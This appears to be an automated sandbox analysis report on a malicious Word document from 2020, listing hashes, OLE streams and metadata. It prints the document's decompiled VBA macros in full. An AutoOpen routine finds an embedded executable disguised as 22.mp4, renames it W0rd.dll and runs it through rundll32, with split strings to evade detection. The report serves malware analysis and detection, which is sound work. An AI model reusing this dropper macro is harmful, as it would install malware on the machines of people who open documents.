                                                                                                                                                        SHA1:870ECAFD5EC499D628DA7C40DE5DDA7077D69B5C
                                                                                                                                                        SHA-256:695A224B4078A4C81952EDBD75B4CC015EE6E7E7B873674EF9B80CDEF9B87A59
                                                                                                                                                        SHA-512:EC88BF93954204C0A479CCE1DCFF42572FCA0C6A3EF713E35386CCAE16E554BB2CADC18E59578A23398E17418B884BB95D1F73BF2040C7C17AA15447B669C470
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........................................................H.......6C......................$...

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: BigAdministrator, Template: Normal.dotm, Last Saved By: BigAdministrator, Revision Number: 56, Name of Creating Application: Microsoft Office Word, Total Editing Time: 44:00, Create Time/Date: Thu Nov 12 08:27:00 2020, Last Saved Time/Date: Wed Nov 18 10:26:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
                                                                                                                                                        Entropy (8bit):6.608390292496962
                                                                                                                                                        TrID:
                                                                                                                                                        • Perfect Keyboard macro set (36024/1) 37.90%
                                                                                                                                                        • Microsoft Word document (32009/1) 33.68%
                                                                                                                                                        • Microsoft Word document (old ver.) (19008/1) 20.00%
                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 8.43%
                                                                                                                                                        File name:1118_8732615.doc
                                                                                                                                                        File size:619520
                                                                                                                                                        MD5:0f75ad40daec01aee7642795cc544bb3
                                                                                                                                                        SHA1:76334ccc6e92d579495671de47664180517cdf05
                                                                                                                                                        SHA256:afba9deb16b5100c5964ca33cd42c2aa6b972ad104efd3d58e0ad8b7070cd5f4
                                                                                                                                                        SHA512:53bc11170d518dc95baddf223370398971f740830e24d9b44b5e7bf61b99a3a62c680d3219bde489a5bb653629a3d7669d022444161b5b2badc6c9d09b2fecd3
                                                                                                                                                        SSDEEP:12288:9uE0gXPByytejpBOaFGyokkn7QljuI2hJdC3ZzoNSBr:9u3gXPQ2eXOaFefgCIn

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OLE
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "1118_8732615.doc"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:True
                                                                                                                                                        Application Name:Microsoft Office Word
                                                                                                                                                        Encrypted Document:False
                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:True

                                                                                                                                                        Summary

                                                                                                                                                        Code Page:1252
                                                                                                                                                        Title:
                                                                                                                                                        Subject:
                                                                                                                                                        Author:BigAdministrator
                                                                                                                                                        Keywords:
                                                                                                                                                        Comments:
                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                        Last Saved By:BigAdministrator
                                                                                                                                                        Revision Number:56
                                                                                                                                                        Total Edit Time:2640
                                                                                                                                                        Create Time:2020-11-12 08:27:00
                                                                                                                                                        Last Saved Time:2020-11-18 10:26:00
                                                                                                                                                        Number of Pages:1
                                                                                                                                                        Number of Words:3
                                                                                                                                                        Number of Characters:19
                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                        Security:0

                                                                                                                                                        Document Summary

                                                                                                                                                        Document Code Page:1252
                                                                                                                                                        Number of Lines:1
                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                                                        Company:
                                                                                                                                                        Contains Dirty Links:False
                                                                                                                                                        Shared Document:False
                                                                                                                                                        Changed Hyperlinks:False
                                                                                                                                                        Application Version:1048576

                                                                                                                                                        Streams with VBA

                                                                                                                                                        VBA File Name: Module1.bas, Stream Size: 4151
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/Module1
                                                                                                                                                        VBA File Name:Module1.bas
                                                                                                                                                        Stream Size:4151

                                                                                                                                                        VBA Code Keywords

                                                                                                                                                        Keyword
                                                                                                                                                        lka(UUu
                                                                                                                                                        Object
                                                                                                                                                        "al\Te"
                                                                                                                                                        VB_Name
                                                                                                                                                        vbDirectory)
                                                                                                                                                        "Loc"
                                                                                                                                                        "mp",
                                                                                                                                                        RootPath
                                                                                                                                                        zxc(afs)
                                                                                                                                                        Getme(Left(ActiveDocument.AttachedTemplate.Path,
                                                                                                                                                        String
                                                                                                                                                        ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        String)
                                                                                                                                                        Selection.TypeBackspace
                                                                                                                                                        Nothing
                                                                                                                                                        myArr
                                                                                                                                                        ntgs)
                                                                                                                                                        lka(RootPath)
                                                                                                                                                        fld.SUBFOLDERS
                                                                                                                                                        Getme(RootPath
                                                                                                                                                        "Local\Temp")
                                                                                                                                                        While
                                                                                                                                                        ssss()
                                                                                                                                                        Function
                                                                                                                                                        CreateObject("Scripting.FileSystemObject")
                                                                                                                                                        Dir(RootPath
                                                                                                                                                        Getme(vhhs.Path)
                                                                                                                                                        Dir(Left(ActiveDocument.AttachedTemplate.Path,
                                                                                                                                                        Attribute
                                                                                                                                                        fso.GetFolder(asdf)
                                                                                                                                                        Getme
                                                                                                                                                        strFileExists
                                                                                                                                                        Dir(ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        VBA Code
                                                                                                                                                        Attribute VB_Name = "Module1"
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Sub ssss()
                                                                                                                                                        Dim ntgs
                                                                                                                                                        Dim sda
                                                                                                                                                        Call oo
                                                                                                                                                            ntgs = 50
                                                                                                                                                        sda = 49
                                                                                                                                                        Dim jos
                                                                                                                                                        
                                                                                                                                                        While sda < 50
                                                                                                                                                              ntgs = ntgs - 1
                                                                                                                                                              
                                                                                                                                                              If Dir(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then
                                                                                                                                                                
                                                                                                                                                            Else
                                                                                                                                                          
                                                                                                                                                           sda = 61
                                                                                                                                                            End If
                                                                                                                                                        
                                                                                                                                                           Wend
                                                                                                                                                           
                                                                                                                                                        Call Getme(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Local\Temp")
                                                                                                                                                          Selection.TypeBackspace
                                                                                                                                                           
                                                                                                                                                        
                                                                                                                                                        End Sub
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Function Getme(RootPath As String)
                                                                                                                                                        
                                                                                                                                                        Dim fso As Object
                                                                                                                                                        Dim fld As Object
                                                                                                                                                        Dim vhhs As Object
                                                                                                                                                        Dim afs As String
                                                                                                                                                        Dim myArr
                                                                                                                                                        Dim asdf
                                                                                                                                                        asdf = RootPath
                                                                                                                                                        Set fso = CreateObject("Scripting.FileSystemObject")
                                                                                                                                                        
                                                                                                                                                        Set fld = fso.GetFolder(asdf)
                                                                                                                                                        
                                                                                                                                                        strFileExists = Dir(RootPath & "\22.mp4")
                                                                                                                                                              If strFileExists = "" Then
                                                                                                                                                            
                                                                                                                                                        For Each vhhs In fld.SUBFOLDERS
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        afs = vhhs
                                                                                                                                                        
                                                                                                                                                                Call zxc(afs)
                                                                                                                                                            myArr = Getme(vhhs.Path)
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Next
                                                                                                                                                            Set vhhs = Nothing
                                                                                                                                                        Getme = Arr
                                                                                                                                                        
                                                                                                                                                        Set fld = Nothing
                                                                                                                                                        Set fso = Nothing
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                            Else
                                                                                                                                                              If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then
                                                                                                                                                              
                                                                                                                                                             
                                                                                                                                                           Call lka(RootPath)
                                                                                                                                                              Else
                                                                                                                                                              Exit Function
                                                                                                                                                          End If
                                                                                                                                                            
                                                                                                                                                                End If
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        End Function
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Sub lka(UUu As String)
                                                                                                                                                           Name UUu & "\22.mp4" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll"
                                                                                                                                                                      
                                                                                                                                                        End Sub
                                                                                                                                                        VBA File Name: Module2.bas, Stream Size: 2129
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/Module2
                                                                                                                                                        VBA File Name:Module2.bas
                                                                                                                                                        Stream Size:2129

                                                                                                                                                        VBA Code Keywords

                                                                                                                                                        Keyword
                                                                                                                                                        Unit:=wdCharacter,
                                                                                                                                                        Dir(sf
                                                                                                                                                        VB_Name
                                                                                                                                                        ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        String)
                                                                                                                                                        Selection.TypeBackspace
                                                                                                                                                        Unit:=wdLine,
                                                                                                                                                        strFileExists
                                                                                                                                                        Selection.Copy
                                                                                                                                                        zxc(sf
                                                                                                                                                        Selection.MoveRight
                                                                                                                                                        Attribute
                                                                                                                                                        Selection.MoveDown
                                                                                                                                                        Dir(ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        VBA Code
                                                                                                                                                        Attribute VB_Name = "Module2"
                                                                                                                                                        Sub oo()
                                                                                                                                                        Selection.MoveDown Unit:=wdLine, Count:=1
                                                                                                                                                            Selection.MoveRight Unit:=wdCharacter, Count:=5
                                                                                                                                                            Selection.MoveDown Unit:=wdLine, Count:=24
                                                                                                                                                            Selection.MoveRight Unit:=wdCharacter, Count:=50
                                                                                                                                                            Selection.MoveDown Unit:=wdLine, Count:=24
                                                                                                                                                            Selection.MoveRight Unit:=wdCharacter, Count:=5
                                                                                                                                                            Selection.MoveDown Unit:=wdLine, Count:=24
                                                                                                                                                            Selection.MoveRight Unit:=wdCharacter, Count:=50
                                                                                                                                                           Selection.TypeBackspace
                                                                                                                                                           Selection.Copy
                                                                                                                                                           
                                                                                                                                                        End Sub
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Sub zxc(sf As String)
                                                                                                                                                        strFileExists = Dir(sf & "\22.mp4")
                                                                                                                                                        
                                                                                                                                                              If strFileExists = "" Then
                                                                                                                                                            
                                                                                                                                                            Else
                                                                                                                                                                 If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then
                                                                                                                                                        
                                                                                                                                                                Name sf & "\22.mp4" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll"
                                                                                                                                                            Else
                                                                                                                                                           Exit Sub
                                                                                                                                                            End If
                                                                                                                                                          
                                                                                                                                                            End If
                                                                                                                                                        End Sub
                                                                                                                                                        VBA File Name: ThisDocument.cls, Stream Size: 1743
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/ThisDocument
                                                                                                                                                        VBA File Name:ThisDocument.cls
                                                                                                                                                        Stream Size:1743

                                                                                                                                                        VBA Code Keywords

                                                                                                                                                        Keyword
                                                                                                                                                        VB_Name
                                                                                                                                                        VB_Creatable
                                                                                                                                                        VB_Exposed
                                                                                                                                                        AutoOpen()
                                                                                                                                                        VB_Customizable
                                                                                                                                                        a.ShellExecute("rund"
                                                                                                                                                        VB_TemplateDerived
                                                                                                                                                        "ThisDocument"
                                                                                                                                                        False
                                                                                                                                                        Attribute
                                                                                                                                                        Dir(ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        VB_PredeclaredId
                                                                                                                                                        VB_GlobalNameSpace
                                                                                                                                                        SW_SHOWNORMAL)
                                                                                                                                                        VB_Base
                                                                                                                                                        Scr_hDC
                                                                                                                                                        ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        VBA Code
                                                                                                                                                        Attribute VB_Name = "ThisDocument"
                                                                                                                                                        Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                                                        Attribute VB_Creatable = False
                                                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                                                        Attribute VB_Exposed = True
                                                                                                                                                        Attribute VB_TemplateDerived = True
                                                                                                                                                        Attribute VB_Customizable = True
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Sub AutoOpen()
                                                                                                                                                        Call ssss
                                                                                                                                                        
                                                                                                                                                         If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then
                                                                                                                                                         Else
                                                                                                                                                         
                                                                                                                                                        Dim a As New Shell32.Shell
                                                                                                                                                        Dim Scr_hDC As Long
                                                                                                                                                        Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
                                                                                                                                                        End If
                                                                                                                                                        End Sub

                                                                                                                                                        Streams

                                                                                                                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:114
                                                                                                                                                        Entropy:4.2359563651
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:280
                                                                                                                                                        Entropy:2.3837065211
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 436
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:436
                                                                                                                                                        Entropy:3.43041331515
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B i g A d m i n i s t r a t o r . . . . . . . .
                                                                                                                                                        Stream Path: 1Table, File Type: ARC archive data, crunched, Stream Size: 7940
                                                                                                                                                        General
                                                                                                                                                        Stream Path:1Table
                                                                                                                                                        File Type:ARC archive data, crunched
                                                                                                                                                        Stream Size:7940
                                                                                                                                                        Entropy:5.90771618128
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Stream Path: Data, File Type: data, Stream Size: 129034
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Data
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:129034
                                                                                                                                                        Entropy:7.75936836126
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:7 . . . D . d . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . s . . . Z . . . . A . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . 2 . 0 . 2 . 0 . _ . 2 . . . P . i . c . t . u . r . e . . 1 . . . 2 . 0 . 2 . 0 . _ . 2 . . . . . . . . . . . . . . . R . . . e . . . . . . b b . . o . . k . 1 . U . { . . . A . . . . . . . D . . . . . p z . F . . 9 . . . . b
                                                                                                                                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 459
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/PROJECT
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Stream Size:459
                                                                                                                                                        Entropy:5.38318286733
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:I D = " { 1 1 0 A 9 F D 0 - A 4 8 D - 4 3 4 6 - B D 2 3 - C D 9 3 8 7 2 F 3 4 6 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 5 8 7 4 B 7 1 4 B 9 1 4 F 9 1 4 F 9 1 4 F 9 1 4 F " . . D P B = " A 9 A B 6 7 7 8 6 8 7 8 6 8 7 8 " . . G C = " C D C F 0 3 B 9 0 3 D C 0 4 D
                                                                                                                                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 89
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/PROJECTwm
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:89
                                                                                                                                                        Entropy:3.27035029005
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
                                                                                                                                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3484
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:3484
                                                                                                                                                        Entropy:4.50229327005
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 703
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/dir
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:703
                                                                                                                                                        Entropy:6.40700107529
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . * . . a .
                                                                                                                                                        Stream Path: ObjectPool/_1667171533/\x1CompObj, File Type: data, Stream Size: 76
                                                                                                                                                        General
                                                                                                                                                        Stream Path:ObjectPool/_1667171533/\x1CompObj
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:76
                                                                                                                                                        Entropy:3.09344952647
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . .
                                                                                                                                                        Stream Path: ObjectPool/_1667171533/\x1Ole10Native, File Type: data, Stream Size: 453046
                                                                                                                                                        General
                                                                                                                                                        Stream Path:ObjectPool/_1667171533/\x1Ole10Native
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:453046
                                                                                                                                                        Entropy:6.15758899612
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . 2 2 . m p 4 . C : \\ U s e r s \\ B i g A d m i n i s t r a t o r \\ A p p D a t a \\ L o c a l \\ M i c r o s o f t \\ W i n d o w s \\ I N e t C a c h e \\ C o n t e n t . M S O \\ 2 2 . m p 4 . . . . . , . . . C : \\ U s e r s \\ B I G A D M ~ 1 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 2 2 . m p 4 . . . . . M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e
                                                                                                                                                        Data Raw:b2 e9 06 00 02 00 32 32 2e 6d 70 34 00 43 3a 5c 55 73 65 72 73 5c 42 69 67 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 49 4e 65 74 43 61 63 68 65 5c 43 6f 6e 74 65 6e 74 2e 4d 53 4f 5c 32 32 2e 6d 70 34 00 00 00 03 00 2c 00 00 00 43 3a 5c 55 73 65 72 73 5c 42 49 47 41 44 4d 7e 31 5c 41 70
                                                                                                                                                        Stream Path: ObjectPool/_1667171533/\x3ObjInfo, File Type: data, Stream Size: 6
                                                                                                                                                        General
                                                                                                                                                        Stream Path:ObjectPool/_1667171533/\x3ObjInfo
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:6
                                                                                                                                                        Entropy:1.79248125036
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:@ . . . . .
                                                                                                                                                        Data Raw:40 00 03 00 01 00
                                                                                                                                                        Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                                                                                        General
                                                                                                                                                        Stream Path:WordDocument
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:4096
                                                                                                                                                        Entropy:1.58736027199
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j 8 . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . Z p . e Z p . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:ec a5 c1 00 59 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 16 08 00 00 0e 00 62 6a 62 6a 38 1a 38 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 5a 70 d2 65 5a 70 d2 65 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        UDP Packets


                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage


                                                                                                                                                        Memory Usage


                                                                                                                                                        High Level Behavior Distribution


                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:16:23:47
                                                                                                                                                        Start date:18/11/2020
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                        Imagebase:0x1d0000
                                                                                                                                                        File size:1937688 bytes
                                                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Call Graph

                                                                                                                                                        Graph

                                                                                                                                                        Module: Module1

                                                                                                                                                        Declaration
Line  Content
1     Attribute VB_Name = "Module1"

                                                                                                                                                        Non-Executed Functions
APIs    Meta Information

                                                                                                                                                        Part of subcall function oo@Module2: MoveDown

                                                                                                                                                        Part of subcall function oo@Module2: wdLine

                                                                                                                                                        Part of subcall function oo@Module2: MoveRight

                                                                                                                                                        Part of subcall function oo@Module2: wdCharacter

                                                                                                                                                        Part of subcall function oo@Module2: MoveDown

                                                                                                                                                        Part of subcall function oo@Module2: wdLine

                                                                                                                                                        Part of subcall function oo@Module2: MoveRight

                                                                                                                                                        Part of subcall function oo@Module2: wdCharacter

                                                                                                                                                        Part of subcall function oo@Module2: MoveDown

                                                                                                                                                        Part of subcall function oo@Module2: wdLine

                                                                                                                                                        Part of subcall function oo@Module2: MoveRight

                                                                                                                                                        Part of subcall function oo@Module2: wdCharacter

                                                                                                                                                        Part of subcall function oo@Module2: MoveDown

                                                                                                                                                        Part of subcall function oo@Module2: wdLine

                                                                                                                                                        Part of subcall function oo@Module2: MoveRight

                                                                                                                                                        Part of subcall function oo@Module2: wdCharacter

                                                                                                                                                        Part of subcall function oo@Module2: TypeBackspace

                                                                                                                                                        Part of subcall function oo@Module2: Copy

                                                                                                                                                        Dir

                                                                                                                                                        Left

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        vbDirectory

                                                                                                                                                        Part of subcall function Getme@Module1: CreateObject

                                                                                                                                                        Part of subcall function Getme@Module1: GetFolder

                                                                                                                                                        Part of subcall function Getme@Module1: Dir

                                                                                                                                                        Part of subcall function Getme@Module1: SUBFOLDERS

                                                                                                                                                        Part of subcall function Getme@Module1: Path

                                                                                                                                                        Part of subcall function Getme@Module1: Arr

                                                                                                                                                        Part of subcall function Getme@Module1: Dir

                                                                                                                                                        Part of subcall function Getme@Module1: AttachedTemplate

                                                                                                                                                        Part of subcall function Getme@Module1: ActiveDocument

                                                                                                                                                        Left

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        TypeBackspace

Strings | Decrypted Strings
""""
""""
Line | Instruction | Meta Information
6 | Sub ssss() |
7 | Dim ntgs |
8 | Dim sda |
9 | Call oo() |
10 | ntgs = 50 |
11 | sda = 49 |
12 | Dim jos |
14 | While sda < 50 |
15 | ntgs = ntgs - 1 |
17 | If Dir(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then | Dir, Left, AttachedTemplate, ActiveDocument, vbDirectory
19 | Else |
21 | sda = 61 |
22 | Endif |
24 | Wend |
26 | Call Getme(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Local\Temp") | Left, AttachedTemplate, ActiveDocument
27 | Selection.TypeBackspace | TypeBackspace
30 | End Sub |

APIs | Meta Information
CreateObject
GetFolder
Dir
SUBFOLDERS
Part of subcall function zxc@Module2: Dir
Part of subcall function zxc@Module2: Dir
Part of subcall function zxc@Module2: AttachedTemplate
Part of subcall function zxc@Module2: ActiveDocument
Part of subcall function zxc@Module2: AttachedTemplate
Part of subcall function zxc@Module2: ActiveDocument
Part of subcall function Getme@Module1: CreateObject
Part of subcall function Getme@Module1: GetFolder
Part of subcall function Getme@Module1: Dir
Part of subcall function Getme@Module1: SUBFOLDERS
Part of subcall function Getme@Module1: Path
Part of subcall function Getme@Module1: Arr
Part of subcall function Getme@Module1: Dir
Part of subcall function Getme@Module1: AttachedTemplate
Part of subcall function Getme@Module1: ActiveDocument
Path
Arr
Dir
AttachedTemplate
ActiveDocument
Part of subcall function lka@Module1: AttachedTemplate
Part of subcall function lka@Module1: ActiveDocument

Strings | Decrypted Strings
"Scripting.FileSystemObject"
""""
""""
Line | Instruction | Meta Information
36 | Function Getme(RootPath as String) |
38 | Dim fso as Object |
39 | Dim fld as Object |
40 | Dim vhhs as Object |
41 | Dim afs as String |
42 | Dim myArr |
43 | Dim asdf |
44 | asdf = RootPath |
45 | Set fso = CreateObject("Scripting.FileSystemObject") | CreateObject
47 | Set fld = fso.GetFolder(asdf) | GetFolder
49 | strFileExists = Dir(RootPath & "\22.mp4") | Dir
50 | If strFileExists = "" Then |
52 | For Each vhhs in fld.SUBFOLDERS | SUBFOLDERS
55 | afs = vhhs |
57 | Call zxc(afs) |
58 | myArr = Getme(vhhs.Path) | Path
61 | Next | SUBFOLDERS
62 | Set vhhs = Nothing |
63 | Getme = Arr | Arr
65 | Set fld = Nothing |
66 | Set fso = Nothing |
70 | Else |
71 | If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then | Dir, AttachedTemplate, ActiveDocument
74 | Call lka(RootPath) |
75 | Else |
76 | Exit Function |
77 | Endif |
79 | Endif |
